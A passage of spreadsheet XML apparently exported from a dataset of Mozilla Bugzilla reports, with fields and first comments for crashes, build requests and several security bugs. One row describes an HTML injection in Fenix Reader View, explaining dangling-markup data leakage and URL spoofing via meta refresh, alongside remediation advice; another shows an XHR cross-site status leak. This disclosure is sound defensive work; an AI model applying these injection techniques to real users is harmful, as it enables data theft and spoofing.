      <c r="Q3143" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3143" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3143" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3143" t="n">
        <v>1</v>
      </c>
      <c r="U3143" t="n">
        <v>0</v>
      </c>
      <c r="V3143" t="n">
        <v>6</v>
      </c>
      <c r="W3143" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #529747 +++
Firefox 3.6b4
solaris-sparc:
/firefox/releases/3.6b4/contrib/solaris_tarball/firefox-3.6b4.en-US.solaris-10-fcs-sparc.tar.bz2
solaris-i386:
/firefox/releases/3.6b4/contrib/solaris_tarball/firefox-3.6b4.en-US.solaris-10-fcs-i386.tar.bz2
opensolaris-sparc:
/firefox/releases/3.6b4/contrib/solaris_tarball/firefox-3.6b4.en-US.opensolaris-sparc.tar.bz2
opensolaris-i386:
/firefox/releases/3.6b4/contrib/solaris_tarball/firefox-3.6b4.en-US.opensolaris-i386.tar.bz2
The partial MAR for (3.6b3 to 3.6b4):
/firefox/releases/3.6b4/contrib/solaris_tarball/firefox-3.6b3-3.6b4.en-US.solaris-10-fcs-sparc.partial.mar
/firefox/releases/3.6b4/contrib/solaris_tarball/firefox-3.6b3-3.6b4.en-US.solaris-10-fcs-i386.partial.mar
/firefox/releases/3.6b4/contrib/solaris_tarball/firefox-3.6b3-3.6b4.en-US.opensolaris-sparc.partial.mar
/firefox/releases/3.6b4/contrib/solaris_tarball/firefox-3.6b3-3.6b4.en-US.opensolaris-i386.partial.mar
The complete MAR for 3.6b4:
/firefox/releases/3.6b4/contrib/solaris_tarball/firefox-3.6b4.en-US.solaris-10-fcs-sparc.complete.mar
/firefox/releases/3.6b4/contrib/solaris_tarball/firefox-3.6b4.en-US.solaris-10-fcs-i386.complete.mar
/firefox/releases/3.6b4/contrib/solaris_tarball/firefox-3.6b4.en-US.opensolaris-sparc.complete.mar
/firefox/releases/3.6b4/contrib/solaris_tarball/firefox-3.6b4.en-US.opensolaris-i386.complete.mar
Thanks!</t>
        </is>
      </c>
      <c r="X3143" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3144">
      <c r="A3144" t="n">
        <v>916374</v>
      </c>
      <c r="B3144" t="inlineStr">
        <is>
          <t>2013-09-13 17:24:04 -0700</t>
        </is>
      </c>
      <c r="C3144" t="inlineStr">
        <is>
          <t>[Here Maps] Need German Language support</t>
        </is>
      </c>
      <c r="D3144" t="inlineStr">
        <is>
          <t>2019-02-15 06:33:38 -0800</t>
        </is>
      </c>
      <c r="E3144" t="n">
        <v>1</v>
      </c>
      <c r="F3144" t="n">
        <v>1</v>
      </c>
      <c r="G3144" t="n">
        <v>6</v>
      </c>
      <c r="H3144" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3144" t="inlineStr">
        <is>
          <t>Tech Evangelism Graveyard</t>
        </is>
      </c>
      <c r="J3144" t="inlineStr">
        <is>
          <t>Preinstalled B2G Apps</t>
        </is>
      </c>
      <c r="K3144" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3144" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3144" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N3144" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3144" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3144" t="inlineStr">
        <is>
          <t>[apps watch list]</t>
        </is>
      </c>
      <c r="Q3144" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3144" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3144" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3144" t="n">
        <v>1</v>
      </c>
      <c r="U3144" t="n">
        <v>0</v>
      </c>
      <c r="V3144" t="n">
        <v>7</v>
      </c>
      <c r="W3144" t="inlineStr">
        <is>
          <t>Please provide date for updated app that will support German Language.  This is a blocker for Launch in Germany.</t>
        </is>
      </c>
      <c r="X3144" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3145">
      <c r="A3145" t="n">
        <v>1584615</v>
      </c>
      <c r="B3145" t="inlineStr">
        <is>
          <t>2019-09-27 13:07:51 -0700</t>
        </is>
      </c>
      <c r="C3145" t="inlineStr">
        <is>
          <t>[skiplist] add `objc_msgLookupSuper2` Mac signature to the Skip List</t>
        </is>
      </c>
      <c r="D3145" t="inlineStr">
        <is>
          <t>2019-10-07 09:35:31 -0700</t>
        </is>
      </c>
      <c r="E3145" t="n">
        <v>1</v>
      </c>
      <c r="F3145" t="n">
        <v>1</v>
      </c>
      <c r="G3145" t="n">
        <v>4</v>
      </c>
      <c r="H3145" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3145" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3145" t="inlineStr">
        <is>
          <t>Signature</t>
        </is>
      </c>
      <c r="K3145" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3145" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3145" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3145" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3145" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3145" t="inlineStr"/>
      <c r="Q3145" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3145" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3145" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3145" t="n">
        <v>1</v>
      </c>
      <c r="U3145" t="n">
        <v>0</v>
      </c>
      <c r="V3145" t="n">
        <v>7</v>
      </c>
      <c r="W3145" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1520615 +++
Similar to what happened in bug 1520615, we should add `objc_msgLookupSuper2` to the skip list (or "irrelevant" list) to better differentiate crashes reported in bug 1550843.</t>
        </is>
      </c>
      <c r="X3145" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3146">
      <c r="A3146" t="n">
        <v>552090</v>
      </c>
      <c r="B3146" t="inlineStr">
        <is>
          <t>2010-03-12 15:11:33 -0800</t>
        </is>
      </c>
      <c r="C3146" t="inlineStr">
        <is>
          <t>XHR Cross Site Status leak from xhr.statusText</t>
        </is>
      </c>
      <c r="D3146" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E3146" t="n">
        <v>1</v>
      </c>
      <c r="F3146" t="n">
        <v>1</v>
      </c>
      <c r="G3146" t="n">
        <v>3</v>
      </c>
      <c r="H3146" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3146" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3146" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3146" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3146" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3146" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3146" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3146" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3146" t="inlineStr">
        <is>
          <t>[sg:low]</t>
        </is>
      </c>
      <c r="Q3146" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3146" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3146" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3146" t="n">
        <v>1</v>
      </c>
      <c r="U3146" t="n">
        <v>0</v>
      </c>
      <c r="V3146" t="n">
        <v>11</v>
      </c>
      <c r="W3146" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8
Build Identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8
content/base/src/nsXMLHttpRequest.cpp
GetStatus() checks for a leak of status information from denied cross-site requests but GetStatusText() does not
nsXMLHttpRequest::GetStatus(PRUint32 *aStatus)
{
  *aStatus = 0;
  if (mState &amp; XML_HTTP_REQUEST_USE_XSITE_AC) {
    // Make sure we don't leak status information from denied cross-site
    // requests.
    if (mChannel) {
      nsresult status;
      mChannel-&gt;GetStatus(&amp;status);
      if (NS_FAILED(status)) {
        return NS_OK;
      }
    }
  }
nsXMLHttpRequest::GetStatusText(nsACString&amp; aStatusText)
{
  nsCOMPtr&lt;nsIHttpChannel&gt; httpChannel = GetCurrentHttpChannel();
  aStatusText.Truncate();
  nsresult rv = NS_OK;
  if (httpChannel) {
    rv = httpChannel-&gt;GetResponseStatusText(aStatusText);
  }
  return rv;
}
Reproducible: Always</t>
        </is>
      </c>
      <c r="X3146" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3147">
      <c r="A3147" t="n">
        <v>1184135</v>
      </c>
      <c r="B3147" t="inlineStr">
        <is>
          <t>2015-07-15 07:17:19 -0700</t>
        </is>
      </c>
      <c r="C3147" t="inlineStr">
        <is>
          <t>The "Validating Javascript" eslint steps need to say to run |npm install -g grunt-cli|</t>
        </is>
      </c>
      <c r="D3147" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E3147" t="n">
        <v>1</v>
      </c>
      <c r="F3147" t="n">
        <v>1</v>
      </c>
      <c r="G3147" t="n">
        <v>7</v>
      </c>
      <c r="H3147" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3147" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3147" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3147" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3147" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3147" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3147" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3147" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3147" t="inlineStr"/>
      <c r="Q3147" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3147" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3147" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3147" t="n">
        <v>1</v>
      </c>
      <c r="U3147" t="n">
        <v>0</v>
      </c>
      <c r="V3147" t="n">
        <v>4</v>
      </c>
      <c r="W3147" t="inlineStr">
        <is>
          <t>Currently, the document about 'Validating JavaScript' installation was set incorrectly. There missing some important parameters for grunt installation.</t>
        </is>
      </c>
      <c r="X3147" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3148">
      <c r="A3148" t="n">
        <v>1651520</v>
      </c>
      <c r="B3148" t="inlineStr">
        <is>
          <t>2020-07-08 15:26:39 -0700</t>
        </is>
      </c>
      <c r="C3148" t="inlineStr">
        <is>
          <t>ThreadSanitizer: data race [@ NSC_GetTokenInfo] vs. [@ NSC_CloseSession]</t>
        </is>
      </c>
      <c r="D3148" t="inlineStr">
        <is>
          <t>2021-11-22 23:27:51 -0800</t>
        </is>
      </c>
      <c r="E3148" t="n">
        <v>1</v>
      </c>
      <c r="F3148" t="n">
        <v>1</v>
      </c>
      <c r="G3148" t="n">
        <v>3</v>
      </c>
      <c r="H3148" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3148" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J3148" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K3148" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3148" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3148" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3148" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3148" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3148" t="inlineStr">
        <is>
          <t>[adv-main80+r]</t>
        </is>
      </c>
      <c r="Q3148" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3148" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3148" t="inlineStr">
        <is>
          <t>3.55</t>
        </is>
      </c>
      <c r="T3148" t="n">
        <v>1</v>
      </c>
      <c r="U3148" t="n">
        <v>0</v>
      </c>
      <c r="V3148" t="n">
        <v>7</v>
      </c>
      <c r="W3148" t="inlineStr">
        <is>
          <t>Created attachment 9162318
Detailed Crash Information
The attached crash information was detected by ThreadSanitizer during normal web browsing on mozilla-central 20200708-34fb169ef962. Marking as s-s to be safe.
### General information about TSan reports
#### Why fix races?
Data races are undefined behavior and can cause crashes as well as correctness issues. Compiler optimizations can cause racy code to have unpredictable and hard-to-reproduce behavior.
#### Rating
If you think this race can cause crashes or correctness issues, it would be great to rate the bug appropriately as P1/P2 and/or indicating this in the bug. This makes it a lot easier for us to assess the actual impact that these reports make and if they are helpful to you.
#### False Positives / Benign Races
Typically, races reported by TSan are not false positives [1], but it is possible that the race is benign. Even in this case it would be nice to come up with a fix if it is easily doable and does not regress performance. Every race that we cannot fix will have to remain on the suppression list and slows down the overall TSan performance. Also note that seemingly benign races can possibly be harmful (also depending on the compiler, optimizations and the architecture) [2][3].
[1] One major exception is the involvement of uninstrumented code from third-party libraries.
[2] http://software.intel.com/en-us/blogs/2013/01/06/benign-data-races-what-could-possibly-go-wrong
[3] How to miscompile programs with "benign" data races: https://www.usenix.org/legacy/events/hotpar11/tech/final_files/Boehm.pdf
#### Suppressing unfixable races
If the bug cannot be fixed, then a runtime suppression needs to be added in `mozglue/build/TsanOptions.cpp`. The suppressions match on the full stack, so it should be picked such that it is unique to this particular race. The bug number of this bug should also be included so we have some documentation on why this suppression was added.</t>
        </is>
      </c>
      <c r="X3148" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3149">
      <c r="A3149" t="n">
        <v>417266</v>
      </c>
      <c r="B3149" t="inlineStr">
        <is>
          <t>2008-02-13 08:44:32 -0800</t>
        </is>
      </c>
      <c r="C3149" t="inlineStr">
        <is>
          <t>crash [@ nsEventReceiverSH::IsEventName]</t>
        </is>
      </c>
      <c r="D3149" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E3149" t="n">
        <v>1</v>
      </c>
      <c r="F3149" t="n">
        <v>1</v>
      </c>
      <c r="G3149" t="n">
        <v>3</v>
      </c>
      <c r="H3149" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3149" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3149" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3149" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3149" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3149" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3149" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3149" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3149" t="inlineStr"/>
      <c r="Q3149" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3149" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3149" t="inlineStr">
        <is>
          <t>mozilla1.9beta4</t>
        </is>
      </c>
      <c r="T3149" t="n">
        <v>1</v>
      </c>
      <c r="U3149" t="n">
        <v>0</v>
      </c>
      <c r="V3149" t="n">
        <v>9</v>
      </c>
      <c r="W3149" t="inlineStr">
        <is>
          <t>The second testcase of bug 390813 crashes now [@ nsEventReceiverSH::IsEventName]
###!!! ASSERTION: Don't pass non-string jsval's here!: 'JSVAL_IS_STRING(id)', file /home/smaug/mozilla/mozilla_cvs/mozilla/dom/src/base/nsDOMClassInfo.h, line 360
#0  0x00000032d7097581 in nanosleep () from /lib64/libc.so.6
#1  0x00000032d70973a4 in sleep () from /lib64/libc.so.6
#2  0x00002aaaaaae5419 in ah_crap_handler (signum=11) at nsSigHandlers.cpp:149
#3  0x00002aaaaaaf3df1 in nsProfileLock::FatalSignalHandler (signo=11) at nsProfileLock.cpp:216
#4  &lt;signal handler called&gt;
#5  JS_GetStringChars (str=0x0) at /home/smaug/mozilla/mozilla_cvs/mozilla/js/src/jsapi.c:5240
#6  0x00002aaab0e84fc3 in nsEventReceiverSH::IsEventName (id=3)
    at /home/smaug/mozilla/mozilla_cvs/mozilla/dom/src/base/nsDOMClassInfo.h:362
#7  0x00002aaab0e7d252 in nsWindowSH::SetProperty (this=0x138c590, wrapper=0x1669350, cx=0x138ce60, obj=0x2aaabbb62880, 
    id=3, vp=0x7fff8e8f9158, _retval=0x7fff8e8f88f4)
    at /home/smaug/mozilla/mozilla_cvs/mozilla/dom/src/base/nsDOMClassInfo.cpp:4606
#8  0x00002aaab0660aca in XPC_WN_Helper_SetProperty (cx=0x138ce60, obj=0x2aaabbb62880, idval=3, vp=0x7fff8e8f9158)
    at /home/smaug/mozilla/mozilla_cvs/mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp:962</t>
        </is>
      </c>
      <c r="X3149" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3150">
      <c r="A3150" t="n">
        <v>458883</v>
      </c>
      <c r="B3150" t="inlineStr">
        <is>
          <t>2008-10-07 06:39:04 -0700</t>
        </is>
      </c>
      <c r="C3150" t="inlineStr">
        <is>
          <t>Make Document.documentURI and .textContent noAccess in mailnews</t>
        </is>
      </c>
      <c r="D3150" t="inlineStr">
        <is>
          <t>2009-01-05 13:51:40 -0800</t>
        </is>
      </c>
      <c r="E3150" t="n">
        <v>1</v>
      </c>
      <c r="F3150" t="n">
        <v>1</v>
      </c>
      <c r="G3150" t="n">
        <v>3</v>
      </c>
      <c r="H3150" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3150" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J3150" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K3150" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3150" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3150" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3150" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3150" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3150" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q3150" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3150" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3150" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3150" t="n">
        <v>1</v>
      </c>
      <c r="U3150" t="n">
        <v>0</v>
      </c>
      <c r="V3150" t="n">
        <v>22</v>
      </c>
      <c r="W3150" t="inlineStr">
        <is>
          <t>See bug 453928 comment 5.
We need to fix this on the 1.8 branch and 1.9.0 branch no matter what we're doing on trunk.</t>
        </is>
      </c>
      <c r="X3150" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3151">
      <c r="A3151" t="n">
        <v>1341210</v>
      </c>
      <c r="B3151" t="inlineStr">
        <is>
          <t>2017-02-20 23:22:09 -0800</t>
        </is>
      </c>
      <c r="C3151" t="inlineStr">
        <is>
          <t>Crash in mozilla::MozPromise&lt;T&gt;::Private::Resolve&lt;T&gt;</t>
        </is>
      </c>
      <c r="D3151" t="inlineStr">
        <is>
          <t>2017-03-01 07:37:23 -0800</t>
        </is>
      </c>
      <c r="E3151" t="n">
        <v>1</v>
      </c>
      <c r="F3151" t="n">
        <v>1</v>
      </c>
      <c r="G3151" t="n">
        <v>3</v>
      </c>
      <c r="H3151" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3151" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3151" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K3151" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3151" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3151" t="inlineStr">
        <is>
          <t>Windows 8</t>
        </is>
      </c>
      <c r="N3151" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3151" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3151" t="inlineStr"/>
      <c r="Q3151" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3151" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3151" t="inlineStr">
        <is>
          <t>mozilla54</t>
        </is>
      </c>
      <c r="T3151" t="n">
        <v>1</v>
      </c>
      <c r="U3151" t="n">
        <v>0</v>
      </c>
      <c r="V3151" t="n">
        <v>21</v>
      </c>
      <c r="W3151" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-854564eb-c37f-4b81-98f2-039252170221.
=============================================================</t>
        </is>
      </c>
      <c r="X3151" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3152">
      <c r="A3152" t="n">
        <v>1697604</v>
      </c>
      <c r="B3152" t="inlineStr">
        <is>
          <t>2021-03-10 12:31:44 -0800</t>
        </is>
      </c>
      <c r="C3152" t="inlineStr">
        <is>
          <t>HTML injection vulnerability in Reader View</t>
        </is>
      </c>
      <c r="D3152" t="inlineStr">
        <is>
          <t>2022-11-03 23:26:06 -0700</t>
        </is>
      </c>
      <c r="E3152" t="n">
        <v>1</v>
      </c>
      <c r="F3152" t="n">
        <v>1</v>
      </c>
      <c r="G3152" t="n">
        <v>2</v>
      </c>
      <c r="H3152" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3152" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J3152" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3152" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3152" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3152" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N3152" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3152" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3152" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main88+]</t>
        </is>
      </c>
      <c r="Q3152" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3152" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3152" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3152" t="n">
        <v>1</v>
      </c>
      <c r="U3152" t="n">
        <v>0</v>
      </c>
      <c r="V3152" t="n">
        <v>13</v>
      </c>
      <c r="W3152" t="inlineStr">
        <is>
          <t>Created attachment 9208223
Proof of concept (sending data)
A similar issue has been reported in bug 1658175 before. The fix is incomplete however. While `article.title` and `article.byLine` are being escaped, `article.dir` and other fields are not. In fact, some attributes aren’t even quoted. While CSP prevents direct code execution here, this could still be harmful.
I’ve attached two proof of concept pages, both with a malicious `dir` attribute on the `&lt;html&gt;` tag. The first one contains an `&lt;img&gt;` tag with an unclosed `src` attribute. The closing quote is located in the article “text” then. This makes sure that the entire HTML code before the closing quote is sent in a request to `http://localhost/` (some data here but nothing that should be unknown to the attacking website). You can try it out by navigating to https://palant.info/temp/tP0wR6yK0uN5fN6s/reader_view.html in Fenix and switching on Reader View.
The second proof of concept page injects a `&lt;meta refresh&gt;` tag, causing the page to navigate to Reader View of a data: URI. Normally, top-level navigation to data: URIs is prohibited. This approach allows navigation to other websites as well, the location bar keeps displaying the original website. You can try it out by navigating to https://palant.info/temp/tP0wR6yK0uN5fN6s/reader_view2.html in Fenix and switching on Reader View.
If you inspect the page source code for the second proof of concept and look at the `&lt;a class="domain"&gt;` tag, you will notice that the URL parameter is another potential HTML injection vector. Its current handling is: URL-decoding twice, then passing it through `new URL(...).href`, then putting it into an unquoted attribute in the HTML code. This setup happens to be not exploitable for HTTP URLs (`new URL()` removes any whitespace, and with the HTML5 parser escaping an unquoted attribute is impossible without spaces) but it is with data: URIs.
### Recommendations
I generally recommend escaping everything, ideally automatically. Assumptions about some values being “safe” often break.
This means for https://github.com/mozilla-mobile/android-components/blob/4155fff604166170c4b2b3139cdc1f369ace1b8c/components/feature/readerview/src/main/assets/extensions/readerview/readerview-background.js#L16: Don’t call `encodeURIComponent()` on one value and leave the rest alone. Use `URLSearchParams` to compile this query, it will take care of escaping automatically.
On the receiving end (https://github.com/mozilla-mobile/android-components/blob/4155fff604166170c4b2b3139cdc1f369ace1b8c/components/feature/readerview/src/main/assets/extensions/readerview/readerview.js#L344), there is no need to call `decodeURIComponent()` manually, it only causing double decoding. `URLSearchParams` is already being used here, that’s sufficient.
When composing HTML code (https://github.com/mozilla-mobile/android-components/blob/4155fff604166170c4b2b3139cdc1f369ace1b8c/components/feature/readerview/src/main/assets/extensions/readerview/readerview.js#L129), quote all attributes. Unquoted attributes are a security hazard. And call `escapeHTML()` on all values, right there when inserting into HTML code. It’s too easy to forget this if it is done in another function.
Ideally however, `outerHTML`/`innerHTML` should not be used at all. In this particular case I’d recommend adding this content to the static HTML code, with a `hidden` attribute. Use regular DOM methods (`setAttribute()`, `textContent`) to fill in the dynamic data. These might not be quite as convenient but they are inherently safe. Once everything is filled in, the `hidden` attribute can be removed.</t>
        </is>
      </c>
      <c r="X3152" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3153">
      <c r="A3153" t="n">
        <v>524921</v>
      </c>
      <c r="B3153" t="inlineStr">
        <is>
          <t>2009-10-28 01:27:50 -0700</t>
        </is>
      </c>
      <c r="C3153" t="inlineStr">
        <is>
          <t>Firefox crash on image with src set to a resource with multipart/x-mixed-replace content type [@js_LookupPropertyWithFlags ] or [@RtlEnterCriticalSection ]</t>
        </is>
      </c>
      <c r="D3153" t="inlineStr">
        <is>
          <t>2011-06-16 18:06:22 -0700</t>
        </is>
      </c>
      <c r="E3153" t="n">
        <v>1</v>
      </c>
      <c r="F3153" t="n">
        <v>1</v>
      </c>
      <c r="G3153" t="n">
        <v>3</v>
      </c>
      <c r="H3153" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3153" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3153" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K3153" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L3153" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3153" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3153" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3153" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3153" t="inlineStr">
        <is>
          <t>[sg:critical?][ccbr][has patch][critsmash:resolved]</t>
        </is>
      </c>
      <c r="Q3153" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3153" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3153" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3153" t="n">
        <v>1</v>
      </c>
      <c r="U3153" t="n">
        <v>0</v>
      </c>
      <c r="V3153" t="n">
        <v>55</v>
      </c>
      <c r="W3153" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4
Visiting http://aegeriwetter.dyndns.org:8088/cgi-bin/guestimage.html Firefox 3.5.4 crashes after some time. A clean profile without extensions and themes was used to reproduce.
After removing the clutter from the webpage source code all that remains to reproduce the crash was the image tag. The src-attribute refers to a multipart/x-mixed-replace resource. A reduced test case follows.
Reproducible: Always
Steps to Reproduce:
1. Visit test page
2. wait a few moments
Actual Results:  
Firefox crashes, the dialog to submit the crash report appears
Expected Results:  
Don't crash. Just show the image or reject it.
